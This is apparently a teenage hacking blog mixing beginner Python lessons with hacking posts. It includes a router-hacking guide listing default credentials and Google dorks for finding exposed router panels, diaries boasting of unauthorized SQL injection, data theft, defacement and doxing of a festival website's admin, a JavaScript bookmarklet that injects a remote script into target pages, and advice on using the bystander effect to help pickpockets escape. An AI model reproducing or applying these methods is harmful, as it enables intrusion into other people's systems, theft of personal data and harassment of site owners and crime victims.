Python Programming Lesson Four. ( beginning strings )

    Today’s lesson will be a short one since we will just be discussing Python’s ability to write a user’s input a text file. This code will do two things, it will take whatever you type and assign a variable to it and then it will print that variable to a text file which you will also choose the name of.

ttw = str(raw_input("Enter the text you would like to write to the file: "))

ftw = str(raw_input("What would you like to name the file: "))

textfile=open(ftw,'w')

textfile.write(ttw)

ttw, and ftw are simply the variables for what you want wrote to the file, and what to name the file. The “w” in textfile means to write. Python has three main ways to interact with text files, write, read, append.

Site Update.

     You may have noticed the banner at the top, or the other ads we had shortly. To be able to bring you more content Clocwork and I are still working on getting a domain name and host. While there may be some changes over the next few weeks it will be nothing major.

Python Programming Lesson Three.

     In programming lesson three we will be covering the os module of Python, which allows you to use command line functions inside a Python program. Now since most programs can be run from command line this has nearly unlimited possibilities. Unlike my other lesson this one requires some knowledge of command line depending on your operating system. Windows and Mac/Linux use somewhat different commands so this program will also be teaching you how to take a user’s input and use an IF command.

import os

opsys = raw_input("Are you using a Windows machine yes/no ")

if opsys =='yes':

                print 'This will use the windows echo and %random% function'

                os.system('echo %random%')

if opsys =='no':

                print 'This will use the linux echo command'

                os.system('echo hello')

      You may notice the indentions which is very important in Python.   We are using the IF command to determine which O.S the user is running so we can determine the appropriate commands to use.

Reverse Engineering Java Applets : Basic Level

     This is a basic tutorial for reverse engineering Java Applets. This has many functions to it, so I will not cover every single possible function for reverse engineering an applet, but in this tutorial we will simply be using this method to simply understand how another applet works. Let us begin...

I will be doing this method from my OS (which is Ubuntu) so I will be doing a lot of command line for my compiling (because frankly I don't care enough to get a compiler. For these steps, use your own method of compiling a Java applet, there is not really one specific way to follow this tutorial)

For this tutorial you will need

- JDK (Java Development Kit), you can download this from Sun Microsystems' Website
- JAD (Java Decompiler), you can download this here
- Basic knowledge of Java
- Java Compiler (you can use your own, or do it from command line, it's still simple from command line, but most people want a GUI)


Once you've downloaded the JDK (if you didn't already have it) and the Java Decompiler, you're going to need to find an applet that you want to reverse engineer. I found (through searching "java applet examples" on Google) an applet that I thought would be perfect for this tutorial here

Basically, I just wanted to see how this applet works. So, I decided I'd crack it open and get to it.

First, we need to actually get the class file. The class file is a binary file that makes it so that the interpreter (probably used the wrong word, but whatever) can display the applet (since it can't read plain text like we can). To get this class file, we need to find out where the class file is located

Note: Almost all class files will be in the same directory as the applet you're viewing

But, to be sure, we're going to right click the page and select the "View Source" option. Once we do that, we need to press Ctrl+F and search for "APPLET" (make sure that match case is off when you do this)

You want to keep searching until you find a tag that looks something like this

<APPLET CODE="image3dcube.class" WIDTH=250 HEIGHT=250>

 Now, if you're not on the same website as me, then this will look different. But, the class file that we're looking for is located after "CODE=". In this case, we can see that the class file is "image3dcube.class". So, to get this file we need go into the url bar, get rid of "applet2.html" and put in "image3dcube.class" like so

You should then get a prompt asking you if you want to download the file. Obviously, you'll want to say yes. Now, the best place to save the file is in the folder or location where your Java Decompiler is. So, go and do that now. This is where the command line stuff will come in. What you'll want to do is change to the directory where your image3dcube.class file and your Java Decompiler are and then you'll want to run your compiler from command line.

To do this in Linux or Mac, you'll just type this

./jad image3dcube.class

And it should end up looking like this

Now, in Windows, I'm assuming you just simply need to type "jad image3dcube.class" in your Command Prompt and it should work the same way. 

Either way you do it, you should end up getting a file named "image3dcube.jad". Just open this with a text editor and now you can see the code that is inside. Now, in order to run this file we need a few things.

- A new Java and Class file

- An applet for viewing

To create our new Java file, we select the code (ignoring the comments at the top) and copy it. Then, we create a new file (with the same name as the original file) but make it a .java extension. Then, paste the code from .jad file into our new .java file and save it. Next, delete our old class file (the image3dcube.class) and we will run our compiler on our new Java file. To do this from command line (which is easier because you should already be in the same directory. Type:

javac image3dcube.java

This will compile the code and give you a new image3d.class file. You can now modify the code from the image3dcube.java file, compile, and then run it. But, we need a way to actually view the applet. Unfortunately for us, the source code from the original applet uses Parameters. So, in order for this code to run properly, we need to copy the applet code from the original site's source file and change some values.

The original code for the applet is this:

<APPLET CODE="image3dcube.class" WIDTH=250 HEIGHT=250>
<PARAM name="background" value="FFFFFF">
<PARAM name="shadowcolor" value="FFFFFF">
<PARAM name="textcolor" value="000000">
<PARAM name="spotlight" value="no">
<PARAM name="showlightbutton" value="no">
<PARAM name="sleeptime" value="5">
<PARAM name="target" value="_self">
<PARAM name="anglestep" value="8">

<PARAM name="mouseresponse" value="6">
<PARAM name="zoomspeed" value="4">
<PARAM name="image0" value="2comp1.gif">
<PARAM name="image1" value="2comp2.gif">
<PARAM name="image2" value="2comp3.gif">
<PARAM name="image3" value="2comp4.gif">
<PARAM name="image4" value="2comp5.gif">
<PARAM name="image5" value="2comp6.gif">
<PARAM name="url0" value="http://oran.k12.mo.us/fbla/index.html">
<PARAM name="url1" value="http://oran.k12.mo.us/fbla/index.html">
<PARAM name="url2" value="http://oran.k12.mo.us/fbla/index.html">
<PARAM name="url3" value="http://oran.k12.mo.us/fbla/index.html">
<PARAM name="url4" value="http://oran.k12.mo.us/fbla/index.html">
<PARAM name="url5" value="http://oran.k12.mo.us/fbla/index.html">
</APPLET>

 Now, what you'll need to do, is copy the applet code then create a new .html file. I generally name this file "applet.html" because it's a general name. Once you've made this file, paste the code into the applet.

For applets that don't use parameters, you can simply copy and paste this:

<applet code="CLASS FILE HERE" width="WIDTH OF APPLET" height="HEIGHT OF APPLET"> </applet>

change the values, and it will run. But, since this applet uses parameters, we need to satisfy these parameters or change them if necessary. If we were trying to reverse engineer a real applet, we'd want all of the pictures that the applet originally used, but for this, the general idea of this applet is so that you can put your own images. For the Linux users, you can use wget and usually get all of the images you need. For a guide to wget, go here. If you end up getting not-needed images, then try changing the level.

Luckily for us, this applet is very flexible about our images, and our original goal was to see how this worked, maybe improve it, and then put in our own images. So, to do this, all you need to do is put images (maximum of 6) on your server or in your folder (the same folder as your applet) and then change the applet's parameters to be the file name of those images. Then, open the applet or use "appletviewer YOUR FILE NAME HERE.html" and see if it works.


 There are many uses for reverse engineering a Java applet. To crack a password, to see where files are stored, or just to see how an applet works so that you can maybe improve your own code or heaven forbid leech the source. Anyway, I hope you enjoyed this tutorial, and you will hopefully be seeing some more useful tutorials later on in the future.

Thanks,
- Clocwork

Programming Lesson Number Two ( Math.py )

                Today’s lesson will be covering use of the Python Math module, and Python’s built-in math functions. The Math module is a module specifically designed to expand on Python’s mathematical functionality by adding things such as square roots, sin, cos , tan. Now if you have ever tried to make a program to solve certain math problems, and have found yourself lacking in certain functions; you will be lacking no longer! The built-in math functions for python are addition, subtraction, multiplication, and division. I will be once more adding code that uses Math.py, and each of the built-in math functions.

import math

print 5+5

print 5*5

print 5/5

print 5-5

print math.sqrt(25)

raw_input()

     Import math is importing the math.py module, which allows you to use the math.sqrt function. Now you may have not seen raw_input() before, but it is a simpler way to pause the program until the user wishes to continue.

AWUS036H Product Review

     Today, I Shadowdrifter would like to tell you about an item I recently bought. It is the AWUS036H long range wi-fi antenna. It came with two antennas, and two adapters the smaller increases my wi-fi range by around 200 feet where the larger antenna can increase it by 600-700 feet . This also comes with an installation disc for older computers, but it shouldn’t be needed usually. So for anyone into wireless security this is the perfect antenna since it worked on my Backtrack4 right out of the box. It supports deauth for WPA-PSK and packet injection.  The package I bought is Alfa AWUS036H 1000mW 1W 802.11b/g High Gain USB Wireless Long-Range WiFi network Adapter with 5dBi and 9dBi Screw-On Swivel Rubber Antenna and Mini bendable Flex cable for Better adjustment.

You may have realized there is an amazon ad in this post, I would like to take the time to explain why. Recently Clocwork and I have been wanting to transfer to a real host, and get our own domain name so we will be adding some ads to try and afford this domain/hosting! So if you would like to help out just add it as a comment, thank you for reading this.

Programming Lesson Number one.

This is the first edition to the Shadowdrift programming lessons. During these lessons I will be teaching you the basics of the Python language. Today’s lesson will be on installing Python, using modules, and assigning variables. Installing Python is very straightforward go to this link and download the first file . After running the MSI installer you will be able to run Python programs. Now similar to headers in C/C++ Python stores functions in modules which are easily imported with something as simple as import modulename. At the end of this lesson I will include some code you can easily use to test these modules. The third, and final part of our lesson is assigning variables. To assign a variable in python you will write it like this variablename = variable i.e a = ‘123’. The following code uses Python of course, and the two things we have covered modules and variables.

    import time
    a = time.time()
    print a
    time.sleep(3)

[EBOOK] Ye Old Social Engineering [$5]

We recently finished our ebook on Social Engineering techniques. This book consists of many ways to gain information through reconnaissance, make money through somewhat illicit means, and also we reveal some secrets that we found. We hope that you enjoy this book!



Thanks,
- Clocwork and Preistpower

Doxing Assistant V4 or AIO.

I have recently added the finishing touches to my doxing tool version 4.0. For those unfamiliar with the doxing assistant it is based on a simple tool Clocwork made over a year ago. Inspired by his design I started by learning his code, and then added some of my own. It has become one of my biggest projects, and one I am incredibly proud of. The program, and its needed module has been uploaded to Sourceforge. The program uses many Python functions to complete tasks ranging from, decrypting hashes,encrypting hashes,html extracting for sql, sql table bruteforcing,custom password generating, random password generating,dox assistance,and even console based doxing. If you do not understand any of the code please comment, and I will respond as soon as possible.

Chat bot.

Hello, I have recently been working on a new project I call it Socrabot after the philosopher Socrates. The reason for this program is so I can enter the Chatterbox Challenge which is a contest to create the smartest chat bot you can. The contest for this will begin in March so I have until then to improve him. If you have any suggestions/questions you would like added to his database please let me know in the comments section, and I will.

CONGRATS TO SHADOWDRIFTER!

Congrats Shadowdrifter!

One of our writers, Shadowdrifter, has made an outstanding article about hacking Audix systems. His article was recently published on a hacking security website called mrcracker.

Here is just a little taste of the article

So as many of you know cell phone voicemails are incredibly insecure. Now for reconnaissance this isn’t useful when you are gathering information on big companies. Mostly due to the fact that employee cell phones are often private. When doing reconnaissance you should always be aware of the information you have already found, and how it can be used. Thats where an employee directory comes in handy. Many top businesses use the Audix voicemail system so knowledge of the system is invaluable.

So, head on over to mrcracker to view the article now. Again, congratulations Shadowdrifter!

Simple coin flip simulation.

By simple coin flip simulation I am meaning that I created a program with Python to "simulate" flipping a coin 100 hundred times which then returns the result. It is a simple program using list, and the random module built into Python.

import random
# Assigning the variables
i = 1
h = 1
t = 2
lit = []
lih = []
# Starting the loop
while 101 > i:
# Random function to select 1,2 to represent heads and tails.
data = random.randint(h,t)
print data
i = i + 1
data = int(data)

if data == 1:
lih.append("1")

if data == 2:

lit.append("2")

e = len(lit)
e = str(e)
f = len(lih)
f = str(f)
print 'You flipped tails ' + e + ' ' + 'times ' + 'and ' +  'You flipped heads ' + f + ' times'
raw_input()

This is just an example of what you can do with very simple functions, and just a few lines of code.

PODCAST : Episode Four - Dead Drops

In this episode Clocwork briefly talks about Dead Drops.

Router Hacking.

Todays post is on router hacking. I am not going very indepth on how
to hack routers. I will just be going over a few ways to find unsecure routers, and poorly configured routers
The simplest way is to just gain access to the network, and go commonly to
192.168.1.1 for the router page. You will encounter routers without passwords, but you should learn some of the most common
default passwords for routers just in case.

Common default passwords for any router username:password:


admin:admin.
admin:password.
admin: no password.
nothing in either username nor password.
admin:guest
guest:password

Those few password combinations will be the most commonly used. I personally used admin:admin just the other day.
Now we have logged into router so what can we do? Well the first thing we can do is enable remote management ( Remote management is the ability to control the router from a remote location); it is different
for each router, and some do not even have the option.  If you do happen to find the option; you will need to change the default
password, and make sure you allow your I.P address to connect. This is all very self explanatory when you are familiar with routers.
By the end of this post you will be well on your way to becoming an expert at router configuration.

Now its easy to find routers from just finding secure, and unsecure wireless networks to try and access. There are a lot of
routers that web interfaces are actually indexed in Google! So with a simple Google dork we can find dozens even hundreds of unsecured routers
just waiting for someone to experiment with.

Google dorks to find routers:

intitle:"SpeedStream * Management Interface"      ( Speed Stream routers )

intitle:"Setup Home" "You will need * log in before * * change * settings"  ( Belkin routers )

intitle: "actiontec" main setup status " Copyright 2001 Actiontec Electronics Inc"


Those three dorks should keep you busy for quite some time. Now there is one more method that is hit, and miss really.
If you happen to find a target. Port scan them, and look for port 23 which is by default Telnet. There are a lot of off the shelves routers with telnet
active with only the default passwords in place. Which are very similar to the default router passwords except for a select few.

Default Telnet router passwords:


guest:guest
guest:password
user:guest
admin:guest

That is all for now; may your blades stay sharp, your mind sharper! Shadowdrifter.

Using the Bystander Effect

The term bystander effect refers to the phenomenon in which the greater the number of people present, the less likely people are to help a person in distress.
- Darley, J. M. & Latané, B. (1969). Bystander “apathy.” American Scientist, 57, 244-268.

      The Bystander Effect, although a phenomenon, can have some practical use in Social Engineering. 


PLEASE NOTE: This effect will not happen every single time as there are good people in this world that are willing to help those in distress. We do not condone using this for illegal purposes, this post is only for information about psychological phenomenon. 

     Standard tests done by many psychologists involve the use of an injured victim laying in the middle of a busy side-walk. Passers-by simply ignore the injured person and continue walking no matter how much the person in distress is moaning. Occasionally, someone will confront the injured victim and ask if he or she needs any assistance. The number of people that actually help is very slim when compared to the number of people that simply continue walking.


     Most psychologists say this is because people are lazy, other psychologists say that its because no one else sees the distressed person as a priority, so it must not be that big of a deal. Others, including myself (even though I'm not a psychologist) say that they simply avoid the distressed person because they think the person could be pulling a con. However, keep all of these points in mind, as they could be useful for a Social Engineer. 


     Lets say someone gets pick-pocketed. They start to fuss, they make a big commotion, and they tell people to stop the pickpocket. Now lets say that you had a group of people just walk by the distressed person completely ignoring him. There is a high chance that everyone else around the distressed person would do absolutely nothing simply because no one else was doing anything. 


     In theory, a group of pick-pockets could go around and steal purses, wallets, sunglasses etc. in the most non-secretive way possible and they would be able to get away with it (so long as the victim doesn't start chasing after the pick-pocket). 


     A Social Engineer can use this effect in many ways to get away with certain crimes. The biggest factor is the number of people that the Social Engineer has with him. If there's a smaller number of people, the less likely it is that he will get away with his con. The larger the number of people, the easier it will be to get away with it. 


So ask yourself, if you saw someone in distress, would you help them? What if no one else was helping them, would you still help them, or would you just walk away?


Thanks for reading,
- Clocwork

PODCAST : Episode Three - Phreaking

In this podcast we discuss different types of phreaking methods, and you get to hear a prime example of Social Engineering from Ian.

Clocwork Hack Diary : Random Mischief Part One

Posted From My Droid

I feel like I've been getting too soft lately, like I haven't done anything really mischeivious. So, I've decided that I'm going to be doing random acts of mischief until I'm satisfied. Currently, I'm seated in a lawn chair on the porch of another person's house smoking a cigar and watching some birds fight over seed in a bird feeder. To make it more interesting, the person doesn't know I'm here, and I don't know the person at all. I hope they don't show up, but, I need some water, and I know where to get it.



Now I'm seated in a chair at some private pool area. Just got a drink of water from the water fountain out here. Some just yelled at me and told me to leave, I'm telling him I needed some water. Walking over the water fountain again. Water just shot in my face, lol. Just got some water, the guy is still staring at me. About to hop the fence and continue with my running. Since today is Friday and tomorrow is Saturday (and Sunday comes afterwards, Rebecca Black reference bitches) I'll probably do some more mischief then. But, I gotta get home and upload the next podcast, gotta run about 3 miles back and then I'll post it.

Thanks for reading,

-Clocwork

P.S. That guy stared at me the whole time I wrote that last message, now his kid is staring at me. Oh well, I just needed some water

Clocwork Hack Diary : The Festival

 *Sorry for this post being a lot later than Shadow's. Been busy with some other stuff and never really got down to writing this one.*


It started off like any other normal Sunday, woke up late, did some stuff, and then sat down at my computer and got on Skype. I saw a message from Shadow talking about how he found some vulnerable website. He messaged me the website and I saw that it was vulnerable to SQLi. After a little pen-testing on the site, we saw that the only vulnerability on the site was SQLi. So, we got down to business doing some different commands (of course the site had to be v.4 right?). 

     We managed to find some tables, but unfortunately for us the tables for users and admins (if they existed) didn't have any information in them at all. I kept trying to find more and more tables and then it hit me to go ahead and try out the names of the different events (in case you couldn't tell by the title, this website was a site about a festival that happens every year, the site apparently is done by volunteers, go figure, and everyone in the festival is a volunteer). Sure enough, the names of the events gave us a lot of information: emails, addresses, and names for people in large organizations as well as the "Festival Queen" and some country music stars (yay.........).


      After extracting basically the entire database in about 10 minutes, Shadow messages me saying that the admin of the site has a vulnerable password. In fact, the password was the first name of the festival (ie. if the festival name is Lorem Ipsum, the password was lorem). So, thanks to pure human stupidity, we were able to actually access the site.

     Shadow didn't want to deface, but I wanted to screw around as I hadn't had a successful hack in a while. So, me being me, I posted some Pedobear images in the "Kids Festival" section, and added a nice page explaining how we did what we did, or really... how Shadow did what he did. After a little more screwing around, the admin finally erased the pages, and reverted the page back to normal, and changed everyone's password. Well, the admin forgot to change his own password, so we had access to the admin panel once again. This time I decided to send messages to everyone on the staff explaining how weak the security of the website was. This was fun, but the interesting part has yet to come.

     Later on we got bored again and we created a new user on the page, gave him admin privelages, and then logged in to the site as him (because the admin finally had the sense to change the Wordpress passwords, but again we still had access to the site panel, which allows us to edit all of the events). As we were on the site, the admin started to change all of the user passwords to a random string of characters and he deleted our account, but their biggest flaw was when the fact that they had their logins as PHP Sessions with no timeout. So, if we wanted to, we could still be an admin today as long as we didn't log out (if the site were still up that is, the festival is over now though).

     Since we knew the admin was at his computer, we decided to call the guy up and tell him about what we had done. We told him how we got in, and how he could fix it, and I also gave him some suggestions on his PHP code (which is funny because I'm only 17 and I'm definitely not an expert at PHP). To my surprise, he was actually very grateful for the help (or so it seemed) and he even offered us a job working on the site for next years festival. Guess good can pay off after all.

Thanks for reading, and I hope you enjoyed my first hack diary,
- Clocwork

PODCAST : Episode Two - Picking Your Target

Thanks to YouTube time restrictions, we had to divide this podcast up into three segments.

In this podcast we discuss how to pick a target for hacking, and also how to defend yourself from people like us. 

Javascript Injection Toolbox

This is for all of the skids out there that want some easy to use scripts. Recently shadow and I have been working on new methods to hack websites. I, Clocwork, have been focusing on learning Javascript since PHP is fairly easy to understand (although it is rather tedious). Well, I came across Javascript injection a little while ago and I realized that it could essentially be a great tool for me to use later on. So, without further adue, here is my Javascript Injection Toolbox.

Requirements :
- Computer with internet access
- Some basic knowledge of Javascript

Recommended :
- Firefox Browser


What is this toolbox?
 
Basically what this toolbox is, is it's a collection of scripts that make Javascript Injection a lot easier, and are stored in your browser's Bookmark Bar. 

Example:

 
You can easily make your own scripts if you have knowledge of the language. I threw together my "Execute Remote JS" script in about a minute with very little knowledge of the language.

How do I Make it?

     Go to your Bookmark Bar (Firefox) and right click on it. Now, select the option "New Folder." You can name this folder anything you want, I just named mine "Scripts" to save space (since my bookmark bar is actually rather full). 
     Now, right click on the Bookmark Bar again. Select the option "New Bookmark." You should see a box like this (the title will be different)

Example: 

In the "Name" field, you can put whatever you like, but, the location is the important part of this tutorial.

STOP (Please Read)

In case you don't know what you're doing, these bookmarks will allow you to execute Javascript scripts in your browser. To see what I mean, copy this

javascript:alert(document.cookie);

and put it in your URL bar right now. You should see something pop up with all of your cookie information. The use of this "javascript" command allows us to execute codes from our browser.

GO

Now, in the location field, you can put whatever script you wish to run. The idea of this toolbox is make tedious commands simple to use. For instance, if you're someone that likes to modify or spoof cookies, you would want a script that displays cookies for you (like the one I mentioned above).

Of course, these scripts can more interactive. For instance, here's a code I created to execute remote Javascript files from a site.

javascript:function%20display(){var%20location=prompt("WHAT%20IS%20THE%20LOCATION%20OF%20THE%20FILE?","127.0.0.1");%20document.write('<script%20type="text/javascript"%20src="'%20+%20location%20+%20'"></script>');}%20display();

This way, I can modify my remote file at any time without having to change my bookmark.

Execution

To execute these commands, you simply go to your target website, click on your "Scripts" folder and select the script you wish to run. It's simple, and it takes less time than physically typing in the commands yourself. 

Conclusion

The rest of the toolbox is up to you. The first two codes were to get you going, but you can literally put any code you like (as long as its javascript) in these bookmarks. Again, the idea is to use flexible scripts (ones that you can run on any website, you just click once and the code is done), or advanced scripts (allows for more flexibility when you have more diverse sites)

So, I hope you enjoyed this idea, if someone else has had the same idea then awesome. I myself like to have things organized (even though my room is a mess) so I decided I'd go ahead and make a tutorial on this simple thing.

Thanks for reading,

- Clocwork


(check out the thread on HackForums http://www.hackforums.net/forumdisplay.php?fid=47 )

Hakipedia.

So a friend of mine showed me a "new" site, well new to me. If you read the title you may already know of the site, but for those who did not http://hakipedia.com/index.php/Hakipedia . It's very self explanatory it looks like Wikipedia, and functions like it as well. The subject is most obviously hacking and security. There is not a lot of articles yet, but I will be writing some and as I write them I will make a post to inform you of the new page. Lately I have been a bit obsessed with wifi, and War Driving. So the first article I wrote was on War Driving which is just to sum it up the act of searching out wireless access points to document or use for your own needs. In case you have trouble finding the War Driving article here ya go! http://hakipedia.com/index.php/War_Driving .

If you have any comments on it please message me on that site my name is Whitehaze.

Signed, Shadowdrifter.

Shadowdrifter Hack Diary : The Festival

Shadowdrifter's Hack Diary: The Festival.

I had tested dozens of sites for vulnerabilities, finding none. When I was ready to give up
I stumbled across a site that was vulnerable to SQL. When I noticed that the SQL version was 4; I was filled
with anger and hatred. After many attempts at finding the user tables I decided my time was best spent getting
my normal four hours of sleep. I sent a message to my colleague Clocwork, and took my rest.

When I awoke from my slumber I had a message which simply said "Cool". I should have known Clocwork wouldn't care about it until he had seen it for himself. When he finally joined me in my endeavours we began to test the site for other vulnerabilities; finding none we focused solely on the sql injection.
After many creative attempts we finally found the user table. When we inspected in further I noticed that
there was no password column. Disappointed I continued to search through the table only finding the usernames.

So, distraught Clocwork and I retreated to ponder our attack. While he was working on the password
columns I decided "Hey, why not try password guessing". So I got a list of every username, and began my attack
I tried the name of the event, and presto! I was granted super administrator access. Dumbstruck by the adins
terrible password choice I paused to really contemplate his ignorance. Then I messaged my colleague to tell him the good news, and we planned our next move. Our plan was to simply email the admin explaing how we got in, but I decided to go with a different plan. So we created a deface page as a proof of concept then preceeded to dox the system admin. After finding his information we called his home, and had a good chat. Promptly he fixed the vulnerabilities, and changed the passwords to something much more difficult to guess. During our chat Clocwork and I were offered the opportunity to volunteer and do security for the festival next year. So sometimes doing a white hat hack has its benefits.

    This is all for my hacking diary... For now. May your blade stay sharp, your mind sharper.

PODCAST : Episode One - Introductions

This is the introduction podcast where we explain who we are, what we do, and what this blog will be about. We hope you enjoy this blog and these podcasts!